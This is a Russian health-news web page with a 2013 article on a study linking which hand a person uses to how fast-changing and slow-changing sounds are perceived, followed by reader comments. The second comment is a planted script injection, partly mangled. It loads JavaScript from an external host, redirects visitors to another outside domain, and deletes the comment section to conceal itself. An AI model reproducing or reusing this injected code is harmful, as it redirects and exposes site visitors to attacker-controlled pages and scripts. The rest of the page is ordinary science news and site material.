Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  То, что мы слышим, зависи...  >>  То, что мы слышим, зависит от того, что мы делаем
 
Обратная связь
 

То, что мы слышим, зависит от того, что мы делаем

Размер шрифта
17 января 2013 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Американские ученые обнаружили связь между восприятием звуков и движением рук.

То, что мы слышим, зависит от того, что мы делаем

Процесс обработки речи происходит, главным образом, в левом полушарии головного мозга. По мнению некоторых ученых причина кроется в том, что левое полушарие специализируется на анализе быстроменяющихся звуков.

В исследовании приняли участие 24 добровольца, которым включали записи с быстро- и медленноменяющимися звуками на фоне шума. Если участники слышали звуки на фоне шума, они должны были нажимать на специальную кнопку разными руками: в течение первых 20 секунд – правой рукой, в течение следующих 20 секунд – левой и так далее. Когда участники нажимали кнопку правой рукой, они слышали быстроменяющиеся звуки чаще, чем когда нажимали кнопку левой рукой. Для медленноменяющихся звуков была обнаружена противоположная зависимость.

«Поскольку левое полушарие контролирует правую руку, а правое полушарие – левую руку, полученные результаты свидетельствуют о том, что полушария специализируются на обработке разных звуков. Левое полушарие отвечает за обработку быстроменяющихся звуков, а правое – за обработку медленноменяющихся звуков», – поясняет один из авторов исследования Питер Теркельтауб.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

27 января 2013 в 16:50

Цитировать   |   Пожаловаться

Никогда бы не подумала, что разные шумы мы воспринимаем разными полушариями мозга. Я всегда считала, что только одна половина мозга отвечает за какое-либо действие. А оказывается со слухов все в точности да наоборот.. 

2 - zzzzzz

30 июня 2015 в 23:25

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Мы не слышим, как исчезают звуки   Что ваши уши говорят о вас?   Сколько спать, чтобы не было инсульта? Вы удивитесь!   Как почистить уши и не оглохнуть? Можно ли чистить уши ушными палочками?  
16 января 2013То, что мы слышим, зависит от того, что мы делаем 16 ноября 2012Мы не слышим, как исчезают звуки
 
25 октября 2012Ученые научили слышать глухих 03 октября 2012Два популярных анальгетика вызывают потерю слуха!
 

Слайдшоу

1
Что делать с ушной серой?
В чем разница мужских и женских мозгов
ИЗ-ЗА ЧЕГО вы оглохнете?

Тесты

Будет ли у вас инфаркт?
Знаете ли вы свой мозг?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.